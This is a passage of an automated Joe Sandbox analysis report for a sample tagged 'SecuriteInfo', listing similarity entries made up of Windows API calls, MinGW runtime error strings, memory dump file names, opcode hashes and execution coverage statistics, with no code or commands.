                • Address %p has no image-section, xrefs: 002D3160
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
                • Instruction ID: cf24f8d5179d732f18839708204228b73d24cb3152fe6a908713c68429b1b051
                • Opcode Fuzzy Hash: ae1c215c02d1b970cd01d8be6aefa92eb4b93aea2c60055b4fe325c5fc9b605d
                • Instruction Fuzzy Hash: 1951F333761B8186DB10DF16F84875977A4F7997A4F448227EF9D03390EA38CAA5C700
                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC236
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC251
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002AFE45), ref: 002CC264
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast$CloseHandle
                • String ID:
                • API String ID: 3463825546-0
                • Opcode ID: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
                • Instruction ID: 994c0a22271ffe4d741f3788faaaeac898beb4f8fe174fce97ef6bb4d9677d92
                • Opcode Fuzzy Hash: cddee2f21e29cf423b486a8f27a85187065b7977aef0d6eeede48e089fd64c65
                • Instruction Fuzzy Hash: 02515C6273429186FB25CE62D605B6A2690B7457D4F38431DCE8E47BC6D7F9C8B5C301
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: CloseHandle$File$CreateMappingView
                • String ID:
                • API String ID: 1771758222-0
                • Opcode ID: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
                • Instruction ID: 55a1f6223fb52dce76dc9ad22cb402904c0e10f2d5fa06156fbfc658ec369c50
                • Opcode Fuzzy Hash: 6d23f2a262bb6bcd81b6c59ee033bbabfd0b3d40b67309b0f854d42c6b8bc101
                • Instruction Fuzzy Hash: E351B03272075186EB64DFA2E65476D67A0B786B88F18802ADE4947B85DF7CC4A6C700
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: signal
                • String ID: CCG
                • API String ID: 1946981877-1584390748
                • Opcode ID: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
                • Instruction ID: 151758aec83594dbd965dafe7f55a067df940cb36b41ca3d7940700b1e03cdd3
                • Opcode Fuzzy Hash: b2c6dc9096ae1f9aa773ffe311f885973a27ba10920ca0db3dbc828a38cb8965
                • Instruction Fuzzy Hash: 5121F06173458252EF38DA79C86237812019B49374F294B17D97DC73E4DEA9CEE18303
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: ErrorLast$EnvironmentVariable
                • String ID:
                • API String ID: 2691138088-0
                • Opcode ID: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
                • Instruction ID: 0f569872324b0ea5434b2385d281dd18a4cc7cd63d82ea912f104a8528f8d94f
                • Opcode Fuzzy Hash: 8abd1b96f6ffbdccb99d18eedcbe15bbc4f4e10eb1b0d5ca2c732887a0dbb931
                • Instruction Fuzzy Hash: FC81F222720BC186DB359F25D8457ED2365F785BC8F64422ADE1E5BB89CF78C6A2C300
                APIs
                • TlsGetValue.KERNEL32 ref: 002AC582
                • TlsGetValue.KERNEL32 ref: 002AC5D2
                • TlsSetValue.KERNEL32(?,?,00000000,?,002AC741), ref: 002AC5E2
                • TlsGetValue.KERNEL32 ref: 002AC64F
                • TlsGetValue.KERNEL32 ref: 002AC683
                • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,002AC741), ref: 002AC693
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: Value
                • String ID:
                • API String ID: 3702945584-0
                • Opcode ID: ffb944a7ba81d4207274960d1730fe262e32b477ac5d9a27ad14fc8042fabc03
                • Instruction ID: 0583d8611ca6b8cfa99d9124da4f81709318817a0f37feed03103128a3e02c8c
                • Opcode Fuzzy Hash: ffb944a7ba81d4207274960d1730fe262e32b477ac5d9a27ad14fc8042fabc03
                • Instruction Fuzzy Hash: 98312632B3165087DE29AF169A0436D5359A7CAFD0FAC8436AE0D57740DE68CC658B80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID: }0x$ParseIntError$kindmessageKindErrorCustomerror (os error )
                • API String ID: 0-1900568752
                • Opcode ID: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
                • Instruction ID: f0f8e17e7d93a8e18657a7ee82088b093d7615f878c06994c79630f09f0ac7f4
                • Opcode Fuzzy Hash: 87f27eb610d10f7b54759e6b5760645ba624286ce07e0f9d469741830788810a
                • Instruction Fuzzy Hash: EA51DEA2B30BA59AEB14DF61E8007A97B75F346B88F54411AEF4D57B04DF74CAA6C300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: abort$CaptureContextExceptionRaiseUnwind
                • String ID:
                • API String ID: 4122134289-0
                • Opcode ID: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
                • Instruction ID: 6a0f7f06b61899cd7aae41c8344664267e384dac6509d7c71c2708ff802c601d
                • Opcode Fuzzy Hash: 2d41799b5a6f560282747668a07ab79b69b94f7653e47878a1b2f2c31c0c17ba
                • Instruction Fuzzy Hash: 08113A72624BC8C5DB209F65E84439AB7A5F398BD4F541126EF8D43B58CF78C56ACB00
                Strings
                • Unknown pseudo relocation bit size %d., xrefs: 002D3634
                • Unknown pseudo relocation protocol version %d., xrefs: 002D3648
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
                • Instruction ID: e4447f02e57357165f31c5ce561a9a3eb9dd9b43769e0179853a50cea3386852
                • Opcode Fuzzy Hash: 5e19c8390051cb2784b4b55d448f8d48a09f4e2bb34c71610d91828d2c3b458c
                • Instruction Fuzzy Hash: D2713372B20B8486DB10DF65E84479D7761F719BA8F588213DE1C07B98DB38CA60CB42
                APIs
                Strings
                • s [... omitted frame ...], xrefs: 002D021B
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: CloseFileHandleUnmapView
                • String ID: s [... omitted frame ...]
                • API String ID: 2381555830-3732609013
                • Opcode ID: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
                • Instruction ID: 9ccbdf68c1741342d61f74ab19413a75795a1bf6535c40d04e7c55e81bd03926
                • Opcode Fuzzy Hash: a927be645e53ddca24f279b4e4f60cca0b5ba11800129d0781871fbf9eb9e9df
                • Instruction Fuzzy Hash: EA517D72625B8089EB61CF25E8843ED3B60F348B98F584126EF4E47B65DF38C9A5C740
                APIs
                Strings
                • VirtualQuery failed for %d bytes at address %p, xrefs: 002D335B
                • Address %p has no image-section, xrefs: 002D3160, 002D3345
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
                • Instruction ID: 112f91de0f76a905c82097c7caea578588e19a3b1814c95070085be9e742bf7d
                • Opcode Fuzzy Hash: ec8840ad5822ded08d413ae8c9348989ede775e798ba79f284f303dba107ae72
                • Instruction Fuzzy Hash: 95312473B22A8196EE11DF1AFD097983724B795BA4F488127DE5C07390DE38CE96C741
                APIs
                Strings
                • Unknown error, xrefs: 002D30CC
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-3474627141
                • Opcode ID: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
                • Instruction ID: d3abdd8cfd7a3a716a1fc307acb3fe47afd23223fcf9c6153da8a0b0e23a73a6
                • Opcode Fuzzy Hash: 999b21b3e421786fa0ae8a8f3ec2d08227aaf71e2200d13a4ba6fd673149a473
                • Instruction Fuzzy Hash: D8012563958F84C3D705DF18D8003AA7331FBAE749F259316EB8D26615DB35D5A2C700
                APIs
                Strings
                • Overflow range error (OVERFLOW), xrefs: 002D30A0
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4064033741
                • Opcode ID: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
                • Instruction ID: 4728b3d4cfdf45339dc0d08fda599cfac988e8656be4e0c6552a45534949a312
                • Opcode Fuzzy Hash: 3f5c96346864f723ad26de432a75bfa86a9143ad0f692a433a492a73e22c18f8
                • Instruction Fuzzy Hash: 40F03663954E8482D202DF2CE8003AB7330FB9E799F255316EF8D26615DF24D5929700
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                • The result is too small to be represented (UNDERFLOW), xrefs: 002D30B0
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2187435201
                • Opcode ID: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
                • Instruction ID: bd53d71a2be135c81a1bafdb3420563ba97d84f4016eb429b9af4d9207eddc71
                • Opcode Fuzzy Hash: f3ec12f973aa7cf4e75c3929683b614d4c4d39391952d161ed26913664bec971
                • Instruction Fuzzy Hash: E0F03663954E8482D202DF1CE8003AB7330FB9E799F255316EF8D26615DF24D5929700
                APIs
                Strings
                • Argument domain error (DOMAIN), xrefs: 002D3080
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2713391170
                • Opcode ID: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
                • Instruction ID: e16fecdf5ac678afa86d3a9923a7b9596d2d58fae056c566524fb34e7aa0de2f
                • Opcode Fuzzy Hash: 82134d2a7ad93922ea0405daf0d0061b6a33d68d841de9a353900d2f2207178a
                • Instruction Fuzzy Hash: 0DF03663954E8482D202DF1CE8003AB7330FB9E799F255316EF8D26615DF24D5929700
                APIs
                Strings
                • Partial loss of significance (PLOSS), xrefs: 002D3090
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4283191376
                • Opcode ID: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
                • Instruction ID: a6120cf6adda97ab2d839e91b7733dc62b413b5919ada86f223f50f29ce2f149
                • Opcode Fuzzy Hash: 0805a3fd793d26a0c09f0371b15b1c3b584f32a0e7933bd3964dc1db9ec1b28e
                • Instruction Fuzzy Hash: 4FF03663958E8482D202DF1CE8003AB7334FB9E799F255316EF8D26615DF24D5929700
                APIs
                Strings
                • Total loss of significance (TLOSS), xrefs: 002D30C0
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4273532761
                • Opcode ID: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
                • Instruction ID: df7c78c06200a2a9a298ee6633b5b4ac9e44bf8c158f3410bb5f8ba06cd2c8c3
                • Opcode Fuzzy Hash: 914eb782db936fefd1f06460bd4ac75e18b14d65258d685af9434b455c5f5f43
                • Instruction Fuzzy Hash: FFF01262954E8482D2029F1CE8003AB7330FB9E799F255316EF8D26615DF24D5D29700
                APIs
                Strings
                • Argument singularity (SIGN), xrefs: 002D3018
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 002D3047
                Memory Dump Source
                • Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true
                • Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2468659920
                • Opcode ID: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
                • Instruction ID: c0aaa9fb1a08d00b157357c4a17542fd14cfe47c8b5dc448605f6b6e91c6070b
                • Opcode Fuzzy Hash: ca64cc9f4f7eb160ca42a0b23225f9733fbf845813cc3885a9564dba407b4eab
                • Instruction Fuzzy Hash: B0F03062954E8882D302DF1CE8003AB7330FB9E799F255316EF8D2A615DF24D5928700

                Execution Graph

                Execution Coverage:16.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:0%
                Total number of Nodes:88
                Total number of Limit Nodes:5
